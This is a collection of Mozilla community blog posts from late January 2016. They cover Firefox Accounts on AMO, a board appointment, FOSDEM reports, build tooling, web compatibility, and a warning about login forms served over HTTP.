Mozilla Addons Blog: Firefox Accounts on AMO |
In order to provide a more consistent experience across all Mozilla products and services, addons.mozilla.org (AMO) will soon begin using Firefox Accounts.
During the first stage of the migration, which will begin in a few weeks, you can continue logging in with your current credentials and use the site as you normally would. Once you’re logged in, you will be asked to log in with a Firefox Account to complete the migration. If you don’t have a Firefox Account, you can easily create one during this process.
Once you are done with the migration, everything associated with your AMO account, such as add-ons you’ve authored or comments you’ve written, will continue to be linked to your account.
A few weeks after that, when enough people have migrated to Firefox Accounts, old AMO logins will be disabled. This means when you log in with your old AMO credentials, you won’t be able to use the site until you follow the prompt to log in with or create a Firefox Account.
For more information, please take a look at the Frequently Asked Questions below, or head over to the forums. We’re here to help, and we apologize for any inconvenience.
All the add-ons are accessible to the new Firefox Account.
Firefox Accounts is the identity system that is used to synchronize Firefox across multiple devices. Many Firefox products and services will soon begin migrating over, simplifying your sign-in process and making it easier for you to manage all your accounts.
Once you have a Firefox Account, you can go to accounts.firefox.com, sign in, and click on Password.
If you have forgotten your current password:
https://blog.mozilla.org/addons/2016/02/01/firefox-accounts-on-amo/
|
Mitchell Baker: Dr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors |
|
The Mozilla Blog: Dr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors |
Today we are very pleased to announce an addition to the Mozilla Corporation Board of Directors, Dr. Karim Lakhani, a scholar in innovation theory and practice.
Dr. Lakhani is the first of the new appointments we expect to make this year. We are working to expand our Board of Directors to reflect a broader range of perspectives on people, products, technology and diversity. That diversity encompasses many factors: from geography to gender identity and expression, cultural to ethnic identity, expertise to education.
Born in Pakistan and raised in Canada, Karim received his Ph.D. in Management from Massachusetts Institute of Technology (MIT) and is Associate Professor of Business Administration at the Harvard Business School, where he also serves as Principal Investigator for the Crowd Innovation Lab and NASA Tournament Lab at the Harvard University Institute for Quantitative Social Science.
Karim’s research focuses on open source communities and distributed models of innovation. Over the years I have regularly reached out to Karim for advice on topics related to open source and community based processes. I’ve always found the combination of his deep understanding of Mozilla’s mission and his research-based expertise to be extremely helpful. As an educator and expert in his field, he has developed frameworks of analysis around open source communities and leaderless management systems. He has many workshops, cases, presentations, and journal articles to his credit. He co-edited a book of essays about open source software titled Perspectives on Free and Open Source Software, and he recently co-edited the upcoming book Revolutionizing Innovation: Users, Communities and Openness, both from MIT Press.
However, what is most interesting to me is the “hands-on” nature of Karim’s research into community development and activities. He has been a supporter and ready advisor to me and Mozilla for a decade.
Please join me now in welcoming Dr. Karim Lakhani to the Board of Directors. He supports our continued investment in open innovation and joins us at the right time, in parallel with the Katharina Borchert’s transition off of our Board of Directors into her role as our new Chief Innovation Officer. We are excited to extend our Mozilla network with these additions, as we continue to ensure that the Internet stays open and accessible to all.
Mitchell
|
Air Mozilla: Mozilla Weekly Project Meeting, 01 Feb 2016 |
The Monday Project Meeting
https://air.mozilla.org/mozilla-weekly-project-meeting-20160201/
|
Ludovic Hirlimann: Fosdem 2016 day 2 |
Day 2 was a bit different than day 1, has I was less tired. It started by me visiting a few booths in order to decorate my bag and get a few more T-shirts, thanks to wiki-mania, Apache, Open Stack. I got the mini-port to VGA cable I had left in the conference room and then headed for the conferences.
The first one was “Active supervision and monitoring with Salt, Graphite and Grafana“ was interesting because I knew nothing about any of these, except for graphite, but I knew so little that I learned a lot.
The second one titled “War Story: Puppet in a Traditional Enterprise” was someone implementing puppet at an enterprise scale in a big company. It reminded me all the big company I had consulted to a few years back - nothing surprising. It was quiet interesting anyway.
The Third talk I attend was about hardening and securing configuration management software. It was more about general principle than an howto. Quite interesting specially the hardening.io link given at the end of the documentation and the idea to remove ssh if possible on all servers and enable it thru conf. management to investigate issues. I didn’t learn much but it was a good refresher.
I then attend a talk in a very small room that was packed packed packed , about mapping with your phone. As I’ve started contributing to OSM, it was nice to listen and discover all the other apps that I can run on my droid phone in order to add data to the maps. I’ll probably share that next month at the local OSM meeting that got announced this week-end.
Last but not least I attended the key signing party. According to my paperwork, I’ll have sot sign twice 98 keys (twice because I’m creating a new key).
I’ve of course added a few pictures to my Fosdem set.
|
Kartikaya Gupta: Frameworks vs libraries (or: process shifts at Mozilla) |
At some point in the past, I learned about the difference between frameworks and libraries, and it struck me as a really important conceptual distinction that extends far beyond just software. It's really a distinction in process, and that applies everywhere.
The fundamental difference between frameworks and libraries is that when dealing with a framework, the framework provides the structure, and you have to fill in specific bits to make it apply to what you are doing. With a library, however, you are provided with a set of functionality, and you invoke the library to help you get the job done.
It may not seem like a very big distinction at first, but it has a huge impact on various properties of the final product. For example, a framework is easier to use if what you are trying to do lines up with the goal the framework is intended to accomplish. The only thing you need to do is provide (or override) specific things that you need to customize, and the framework takes care of the rest. It's like a builder building your house, and you picking which tile pattern you want for the backsplash. With libraries there's a lot more work - you have a Home Depot full of tools and supplies, but you have to figure out how to put them together to build a house yourself.
The flip side, of course, is that with libraries you get a lot more freedom and customizability than you do with frameworks. With the house analogy, a builder won't add an extra floor for your house if it doesn't fit with their pre-defined floorplans for the subdivision. If you're building it yourself, though, you can do whatever you want.
The library approach makes the final workflow a lot more adaptable when faced with new situations. Once you are in a workflow dictated by a framework, it's very hard to change the workflow because you have almost no control over it - you only have as much control as it was designed to let you have. With libraries you can drop a library here, pick up another one there, and evolve your workflow incrementally, because you can use them however you want.
In the context of building code, the *nix toolchain (a pile of command-line tools that do very specific things) is a great example of the library approach - it's very adaptable as you can swap out commands for other commands to do what you need. An IDE, on the other hand, is more of a framework. It's easier to get started because the heavy lifting is taken care of, all you have to do is "insert code here". But if you want to do some special processing of the code that the IDE doesn't allow, you're out of luck.
An interesting thing to note is that usually people start with frameworks and move towards libraries as their needs get more complex and they need to customize their workflow more. It's not often that people go the other way, because once you've already spent the effort to build a customized workflow it's hard to justify throwing the freedom away and locking yourself down. But that's what it feels like we are doing at Mozilla - sometimes on purpose, and sometimes unintentionally, without realizing we are putting on a straitjacket.
The shift from Bugzilla/Splinter to MozReview is one example of this. Going from a customizable, flexible tool (attachments with flags) to a unified review process (push to MozReview) is a shift from libraries to frameworks. It forces people to conform to the workflow which the framework assumes, and for people used to their own customized, library-assisted workflow, that's a very hard transition. Another example of a shift from libraries to frameworks is the bug triage process that was announced recently.
I think in both of these cases the end goal is desirable and worth working towards, but we should realize that it entails (by definition) making things less flexible and adaptable. In theory the only workflows that we eliminate are the "undesirable" ones, e.g. a triage process that drops bugs on the floor, or a review process that makes patch context hard to access. In practice, though, other workflows - both legitimate workflows currently being used and potential improved workflows get eliminated as well.
Of course, things aren't all as black-and-white as I might have made them seem. As always, the specific context/situation matters a lot, and it's always a tradeoff between different goals - in the end there's no one-size-fits-all and the decision is something that needs careful consideration.
|
Ludovic Hirlimann: Fosdem 2016 day 1 |
This year I’m attending fosdem, after skipping it last year. It’s good to be back even if I was very tired when I arrived yesterday night and managed to visit three of Brussels train station. I was up early and the indications in bus 71 where fucked up so it took me a short walk under some rain to get to the campus - but I made it early and was able to take interesting empty pictures.
The first talk I attended was about MIPS for the embedded world. It was interesting for some tidbids, but felt more like a marketing speech to use MIPS on future embedding project.
After that I wanders and found a bunch of ex-joosters and had very interesting conversation with all of them.
I delivered my talk in 10 minutes and then answered question for the next 20 minutes.
The http2 talk was interesting and the room was packed. But probably not deep enough for me. Still I think we should think about enabling http/2 on mozfr.org.
I left to get some rest after talking to otto about block chain and bitcoins.
|
Mike Hommey: Enabling TLS on this blog |
Long overdue, I finally enabled TLS on this blog. It went almost like a breeze.
I used simp_le to get the certificate from Let’s Encrypt, along Mozilla’s Web Server Configuration generator. SSL Labs now reports a rating of A+.
I just had a few issues:
include
statements,ssl_session_tickets off;
makes browsers unhappy (at least, it made my Firefox unhappy, with a SSL_ERROR_RX_UNEXPECTED_NEW_SESSION_TICKET
error message).I’m glad that there are tools helping to get a proper configuration of SSL. It is sad, though, that the defaults are not better and that we still need to tweak at all. Setting where the certificate and the private key files are should, in 2016, be the only thing to do to have a secure web server.
|
Chris Cooper: RelEng & RelOps Weekly Highlights - January 29, 2016 |
Well, that was a quick month! Time flies when you’re having fun…or something.
Modernize infrastructure:
In an effort to be more agile in creating and/or migrating webapps, Releng has a new domain name and SSL wildcard! The new domain (mozilla-releng.net) is setup for management under inventory and an ssl endpoint has been established in Heroku. See https://wiki.mozilla.org/ReleaseEngineering/How_Tos/Heroku:Add_a_custom_domain
Improve CI pipeline:
Coop (hey, that’s me!) re-enabled partner repacks as part of release automation this week, and was happy to see the partner repacks for the Firefox 44 release get generated and published without any manual intervention. Back in August, we moved the partner repack process and configuration into github from mercurial. This made it trivially easy for Mozilla partners to issue a pull request (PR) when a configuration change was needed. This did require some re-tooling on the automation side, and we took the opportunity to fix and update a lot of partner-related cruft, including moving the repack hosting to S3. I should note that the EME-free repacks are also generated automatically now as part of this process, so those of you who prefer less DRM with your Firefox can now also get your builds on a regular basis.
Release:
One of the main reasons why build promotion is so important for releng and Mozilla is that it removes the current disconnect between the nightly/aurora and beta/release build processes, the builds for which are created in different ways. This is one of the reasons why uplift cycles are so frequently “interesting” - build process changes on nightly and aurora don’t often have an existing analog in beta/release. And so it was this past Tuesday when releng started the beta1 process for Firefox 45. We quickly hit a blocker issue related to gtk3 support that prevented us from even running the initial source builder, a prerequisite for the rest of the release process. Nick, Rail, Callek, and Jordan put their heads together and quickly came up with an elegant solution that unblocked progress on all the affected branches, including ESR. In the end, the solution involved running tooltool from within a mock environment, rather than running it outside the mock environment and trying to copy relevant pieces in. Thanks for the quick thinking and extra effort to get this unblocked. Maybe the next beta1 cycle won’t suck quite as much! The patch that Nick prepared (https://bugzil.la/886543) is now in production and being used to notify users on unsupported versions of GTK why they can’t update. In the past, they would’ve simply received no update with no information as to why.
Operational:
Dustin made security improvements to TaskCluster, ensuring that expired credentials are not honored.
We had a brief Balrog outage this morning [Fri Jan 29]. Balrog is the server side component of the update system used by Firefox and other Mozilla products. Ben quickly tracked the problem down to a change in the caching code. Big thanks to mlankford, Usul, and w0ts0n from the MOC for their quick communication and help in getting things back to a good state quickly.
Outreach:
On Wednesday, Dustin spoke at Siena College, holding an information session on Google Summer of Code and speaking to a Software Engineering class about Mozilla, open source, and software engineering in the real world.
See you next week!
|
Air Mozilla: Foundation Demos January 29 2016 |
Mozilla Foundation Demos January 29 2016
|
Yunier Jos'e Sosa V'azquez: Visualizando lo invisible |
Esta es una traducci'on del art'iculo original publicado en el blog The Mozilla Blog. Escrito por Jascha Kaykas-Wolff .
Hoy en d'ia, la privacidad y las amenazas como el seguimiento invisible de terceros en la Web en l'inea parecen ser muy abstractas. Muchos de nosotros no somos conscientes de lo que est'a pasando con nuestros datos en l'inea o nos sentimos impotentes porque no sabemos qu'e hacer. Cada vez m'as, Internet se est'a convirtiendo en una casa de cristal gigante donde tu informaci'on personal est'a expuesta a terceros que la recogen y utilizan para sus propios fines.
Recientemente hemos lanzado Navegaci'on privada con la protecci'on de seguimiento en Firefox – una caracter'istica que se centra en proporcionar a cualquier persona que utilice Firefox una elecci'on significativa frente a terceros en la Web que podr'ian recolectar sus datos sin su conocimiento o control. Esta es una caracter'istica que se ocupa de la necesidad de un mayor control sobre la privacidad en l'inea, pero tambi'en est'a conectada a un debate permanente e importante en torno a la preservaci'on de un ecosistema Web sano, abierto y sostenible y los problemas y las posibles soluciones a la pregunta sobre los contenidos bloqueados.
A principios de este mes nos dedicamos a un evento de tres d'ias sobre la privacidad en l'inea en Hamburgo, Alemania. Hoy en d'ia, nos gustar'ia compartir algunas impresiones del evento y tambi'en un experimento que filmamos en la famosa calle Reeperbahn.
?Nuestro experimento?
Nos dispusimos a ver si pod'iamos explicar algo que no es f'acilmente visible, la privacidad en l'inea, de una manera muy tangible. Hemos construido un apartamento totalmente equipado con todo lo necesario para disfrutar de un corto viaje a la perla del norte de Alemania. Hicimos el apartamento a disposici'on de los diferentes viajeros que llegan a pasar la noche. Una vez que se conectaron a Wi-Fi de la vivienda, se eliminaron todas las paredes, dejando al descubierto los viajeros a los espectadores y la conmoci'on externa causados
|
Daniel Glazman: Google, BlueGriffon.org and blacklists |
Several painful things happened to bluegriffon.org yesterday... In chronological order:
I need to draw a few conclusions here:
Update: oh I and forgot one thing: during the evening, Earthlink.net blacklisted one of the Mail Transport Agents of Dreamhost. Not, my email address, that whole SMTP gateway at Dreamhost... So all my emails to one of my customers bounced and I can't even let her know some crucial information. I suppose thousands at Dreamhost are impacted. I reported the issue to both Earthlink and DH, of course.
|
Karl Dubost: [worklog] APZ bugs, Some webcompat bugs and HTTP Refresh |
Monday, January 25, 2016. It's morning in Japan. The office room temperature is around 3°C (37.4F). I just put on the Aladdin. The sleep was short or more exactly interrupted a couple of times. Let's go through emails after two weeks away.
My tune for WebCompat for this first quarter 2016 is Jurassic 5 - Quality Control.
Multi Factor Authentication in the computing industry is sold as something easier and more secure. I still have to be convinced about the easier part.
@media screen and (-webkit-min-device-pixel-ratio:2) {}
in the CSS. One difference is that the images are set through content
outside of the mediaquery on a pseudo-element, but inside directly on the element itself. It is currently a non-standard feature as explained by Daniel Holbert. We contacted them. A discussion has been started and the magical Daniel dived a bit more in the issue. Read it.head
. As a result, users have more difficult to add the search for specific locales. Contacted.http://cse.google.com/url?
instead of http://www.google.com/url?
. This is unfortunate because http://cse.google.com/url?
is a 404. em
and px
in a design you always risk that the fonts and rounding of values will not be exactly the same in all browsers. There's a list of scrolling bugs which affects Firefox. The issue is documented on MDN.
These effects work well in browsers where the scrolling is done synchronously on the browser's main thread. However, most browsers now support some sort of asynchronous scrolling in order to provide a consistent 60 frames per second experience to the user. In the asynchronous scrolling model, the visual scroll position is updated in the compositor thread and is visible to the user before the scroll event is updated in the DOM and fired on the main thread. This means that the effects implemented will lag a little bit behind what the user sees the scroll position to be. This can cause the effect to be laggy, janky, or jittery — in short, something we want to avoid.
So if you know someone (or a friend of a friend) who is able to fix or put us in contact with one of these APZ bugs site owners, please tell us in the bugs comments or on IRC (#webcompat on irc.mozilla.org). I did a first pass at bugs triage for contacting the site.
name
attribute for storing a JSON data structure with quotes escaped so that they would not be mangled with the HTML. Crazy!Some of these bugs are not mature yet in terms of outreach status. With Addons/e10s and APZ, it might happen more often that the Web Compat team is contacted for reaching out the sites which have quirks, specific code hindering Firefox, etc. But to reach out a Web site requires first a couple of steps and understanding. I need to write something about this. Added to my TODO list.
Difficult to make progress in some cases, because the developers have completely disappeared. I wonder in some cases if it would not just be better to complete remove it from the addons list. It would both give the chance to someone else to propose something if needed by users (nature doesn't like void) or/and the main developer to wake up and wonder why the addon is not downloadable anymore.
We had a https://wiki.mozilla.org/Compatibility/Mobile/2016-01-26. We discuss about APZ, WebCompat wiki, Firefox OS Tier3 and WebkitCSS bugs status.
To:
field (dynamic mailbox), then the ones where I'm in needinfo
in Bugzilla, then finally the ones which are addressed to specific mailing-lists I have work to do. The rest, rapid scann of the topics (Good email topics are important. Remember!) and marking as read all the ones that I don't have any interests. I'm almost done in one day with all these emails.Otsukare!
|
Ehsan Akhgari: Building Firefox With clang-cl: A Status Update |
Last June, I wrote about enabling building Firefox with clang-cl. We didn’t get these builds up on the infrastructure and things regressed on both the Mozilla and LLVM side, and we got to a state where clang-cl either wouldn’t compile Firefox any more, or the resulting build would be severely broken. It took us months but earlier today we finally managed to finally get a full x86-64 Firefox build with clang-cl! The build works for basic browsing (except that it crashes on yahoo.com for reasons we haven’t diagnosed yet) and just for extra fun, I ran all of our service worker tests (which I happen to run many times a day on other platforms) and they all passed.
This time, we got to an impressive milestone. Previously, we were building Firefox with the help of clang-cl’s fallback mode (which falls back to MSVC when clang fails to build a file for whatever reason) but this time we have a build of Firefox that is fully produced with clang, without even using the MSVC compiler once. And that includes all of our C++ tests too. (Note that we still use the rest of the Microsoft toolchain, such as the linker, resource compiler, etc. to produce the ultimate binaries; I’m only focusing on C and C++ compilation in this post.)
We should now try to keep these builds working. I believe that this is a big opportunity for Firefox to be able to leverage the modern toolchain that we have been enjoying on other platforms on Windows, where we have most of our users. An open source compilation toolchain has long been needed on Windows, and clang-cl is the first open source replacement that is designed to be a drop-in replacement for MSVC, and that makes it an ideal target for Firefox. Also, Microsoft’s recent integration of clang as a front-end for the MSVC code generator promises the prospects of switching to clang/C2 in the future as our default compiler on Windows (assuming that the performance of our clang-cl builds don’t end up being on par with the MSVC PGO compiler.)
My next priority for this project would be to stand up Windows static analysis builds on TreeHerder. That requires getting our clang-plugin to work on Windows, fixing the issues that it may find (since that would be the first time we would be running our static analyses on Windows!), and trying to get them up and running on TaskCluster. That way we would be able to leverage our static analysis on Windows as the first fruit of this effort, and also keep these builds working in the future. Since clang-cl is still being heavily developed, we will be preparing periodic updates to the compiler, potentially fixing the issues that may have been uncovered in either Firefox or LLVM and therefore we will keep up with the development in both projects.
Some of the future things that I think we should look into, sorted by priority:
Longer term, we can look into issues such as helping to add support for full debug information support, with the goal of making it possible to use Visual Studio on Windows with these builds. Right now, we basically debug at the assembly level. Although facilitating this will probably help speed up development too, so perhaps we should start on it earlier. There is also LLDB on Windows which should in theory be able to consume the DWRAF debug information that clang-cl can generate similar to how it does on Linux, so that is worth looking into as well. I’m sure there are other things that I’m not currently thinking of that we can do as well.
Last but not least, this has been a collaboration between quite a few people, on the Mozilla side, Jeff Muizelaar, David Major, Nathan Froyd, Mike Hommey, Raymond Forbes and myself, and on the LLVM side many members of the Google compiler and Chromium teams: Reid Kleckner, David Majnemer, Hans Wennborg, Richard Smith, Nico Weber, Timur Iskhodzhanov, and the rest of the LLVM community who made clang-cl possible. I’m sure I’m forgetting some important names. I would like to appreciate all of these people’s help and effort.
https://ehsanakhgari.org/blog/2016-01-29/building-firefox-with-clang-cl-a-status-update
|
Air Mozilla: Privacy Lab - Privacy for Startups - January 2016 |
Privacy for Startups: Practical Guidance for Founders, Engineers, Marketing, and those who support them Startups often espouse mottos that make traditional Fortune 500 companies cringe....
https://air.mozilla.org/privacy-lab-privacy-for-startups-january-2016/
|
Tanvi Vyas: No More Passwords over HTTP, Please! |
Firefox Developer Edition 46 warns developers when login credentials are requested over HTTP.
Username and password pairs control access to users’ personal data. Websites should handle this information with care and only request passwords over secure (authenticated and encrypted) connections, like HTTPS. Unfortunately, we too frequently see non-secure connections, like HTTP, used to handle user passwords. To inform developers about this privacy and security vulnerability, Firefox Developer Edition warns developers of the issue by changing the security iconography of non-secure pages to a lock with a red strikethrough.
Firefox determines if a password field is secure by examining the page it is embedded in. The embedding page is checked against the algorithm in the W3C’s Secure Contexts Specification to see if it is secure or non-secure. Anything on a non-secure page can be manipulated by a Man-In-The-Middle (MITM) attacker. The MITM can use a number of mechanisms to extract the password entered onto the non-secure page. Here are some examples:
Note that all of the attacks mentioned above can occur without the user realizing that their account has been compromised.
Firefox has been alerting developers of this issue via the Developer Tools Web Console since Firefox 26.
We get this question a lot, so I thought I would call it out specifically. Although transmitting over HTTPS instead of HTTP does prevent a network eavesdropper from seeing a user’s password, it does not prevent an active MITM attacker from extracting the password from the non-secure HTTP page. As described above, active attackers can MITM an HTTP connection between the server and the user’s computer to change the contents of the webpage. The attacker can take the HTML content that the site attempted to deliver to the user and add javascript to the HTML page that will steal the user’s username and password. The attacker then sends the updated HTML to the user. When the user enters their username and password, it will get sent to both the attacker and the site.
Sometimes sites require username and passwords, but don’t actually store data that is very sensitive. For example, a news site may save which news articles a user wants to go back and read, but not save any other data about a user. Most users don’t consider this highly sensitive information. Web developers of the news site may be less motivated to secure their site and their user credentials. Unfortunately, password reuse is a big problem. Users use the same password across multiple sites (news sites, social networks, email providers, banks). Hence, even if access to the username and password to your site doesn’t seem like a huge risk to you, it is a great risk to users who have used the same username and password to login to their bank accounts. Attackers are getting smarter; they steal username/password pairs from one site, and then try reusing them on more lucrative sites.
Put your login forms on HTTPS pages.
Of course, the most straightforward way to do this is to move your whole website to HTTPS. If you aren’t able to do this today, create a separate HTTPS page that is just used for logins. Whenever a user wants to login to your site, they will visit the HTTPS login page. If your login form submits to an HTTPS endpoint, parts of your domain may already be set up to use HTTPS.
In order to host content over HTTPS, you need a TLS Certificate from a Certificate Authority. Let’s Encrypt is a Certificate Authority that can issue you free certificates. You can reference these pages for some guidance on configuring your servers.
We know that users of Firefox Developer Edition don’t only use Developer Edition to work on their own websites. They also use it to browse the net. Developers who see this warning on a page they don’t control can still take a couple of actions. You can try to add “https://” to the beginning of the url in the address bar and see if you are able to login over a secure connection to help protect your data. You can also try and reach out to the website administrator and alert them of the privacy and security vulnerability on their site.
There are ample examples of password reuse leading to large scale compromise. There are fewer well-known examples of passwords being stolen by performing MITM attacks on login forms, but the basic techniques of javascript injection have been used at scale by Internet Service Providers and governments.
Sometimes password fields are in a hidden
Right now, the focus for this feature is on developers, since they’re the ones that ultimately need to fix the sites that are exposing users’ passwords. In general, though, since we are working on deprecating non-secure HTTP in the long run, you should expect to see more and more explicit indications of when things are not secure. For example, in all current versions of Firefox, the Developer Tools Network Monitor shows the lock with a red strikethrough for all non-secure HTTP connections.
Users of Firefox version 44+ (on any branch) can enable or disable this feature by following these steps:
A special thanks to Paolo Amadini and Aislinn Grigas for their implementation and user experience work on this feature!
https://blog.mozilla.org/tanvi/2016/01/28/no-more-passwords-over-http-please/
|
Support.Mozilla.Org: What’s up with SUMO – 28th January |
Hello, SUMO Nation!
Starting from this week, we’re moving things around a bit (to keep them fresh and give you more time to digest and reply. The Friday posts are moving to Thursday, and Fridays will be open for guest posts (including yours) – if you’re interested in writing a post for this blog, let me know in the comments.
We salute you!
That’s it for today, dear SUMOnians! We still have Friday to enjoy, so see you around SUMO and not only… tomorrow!
https://blog.mozilla.org/sumo/2016/01/28/whats-up-with-sumo-28th-january/
|
Air Mozilla: Web QA Weekly Meeting, 28 Jan 2016 |
This is our weekly gathering of Mozilla'a Web QA team filled with discussion on our current and future projects, ideas, demos, and fun facts.
|
Air Mozilla: Reps weekly, 28 Jan 2016 |
This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.
|
Mark Surman: Inspired by our grassroots leaders |
Last weekend, I had the good fortune to attend our grassroots Leadership Summit in Singapore: a hands on learning and planning event for leaders in Mozilla’s core contributor community.
We’ve been doing these sorts of learning / planning / doing events with our broader community of allies for years now: they are at the core of the Mozilla Leadership Network we’re rolling out this year. It was inspiring to see the participation team and core contributor community dive in and use a similar approach.
I left Singapore feeling inspired and hopeful — both for the web and for participation at Mozilla. Here is an email I sent to everyone who participated in the Summit explaining why:
As I flew over the Pacific on Monday night, I felt an incredible sense of inspiration and hope for the future of the web — and the future of Mozilla. I have all of you to thank for that. So, thank you.
This past weekend’s Leadership Summit in Singapore marked a real milestone: it was Mozilla’s first real attempt at an event consciously designed to help our core contributor community (that’s you!) develop important skills like planning and dig into critical projects in areas like connected devices and campus outreach all at the same time. This may not seem like a big deal. But it is.
For Mozilla to succeed, *all of us* need to get better at what we do. We need to reach and strive. The parts of the Summit focused on personality types, planning and building good open source communities were all meant to serve as fuel for this: giving us a chance to hone skills we need.
Actually getting better comes by using these skills to *do* things. The campus campaign and connected devices tracks at the Summit were designed to make this possible: to get us all working on concrete projects while applying the skills we were learning in other sessions. The idea was to get important work done while also getting better. We did that. You did that.
Of course, it’s the work and the impact we have in the world that matter most. We urgently need to explore what the web — and our values — can mean in the coming era of the internet of things. The projects you designed in the connected devices track are a good step in this direction. We also need to grow our community and get more young people involved in our work. The plans you made for local campus campaigns focused on privacy will help us do this. This is important work. And, by doing it the way we did it, we’ve collectively teed it up to succeed.
I’m saying all this partly out of admiration and gratitude. But I’m also trying to highlight the underlying importance of what happened this past weekend: we started using a new approach to participation and leadership development. It’s an approach that I’d like to see us use even more both with our core participation leaders (again, that’s you!) and with our Mozilla Leadership Network (our broader network of friends and allies). By participating so fully and enthusiastically in Singapore, you helped us take a big step towards developing this approach.
As I said in my opening talk: this is a critical time for the web and for Mozilla. We need to simultaneously figure out what technologies and products will bring our values into the future and we need to show the public and governments just how important those values are. We can only succeed by getting better at working together — and by growing our community around the world. This past weekend, you all made a very important step in this direction. Again, thank you.
I’m looking forward to all the work and exploration we have ahead. Onwards!
As I said in my message, the Singapore Leadership Summit is a milestone. We’ve been working to recast and rebuild our participation team for about a year now. This past weekend I saw that investment paying off: we have a team teed up to grow and support our contributor community from around the world. Nicely done! Good things ahead.
The post Inspired by our grassroots leaders appeared first on Mark Surman.
http://marksurman.commons.ca/2016/01/28/inspired-by-our-grassroots-leaders/
|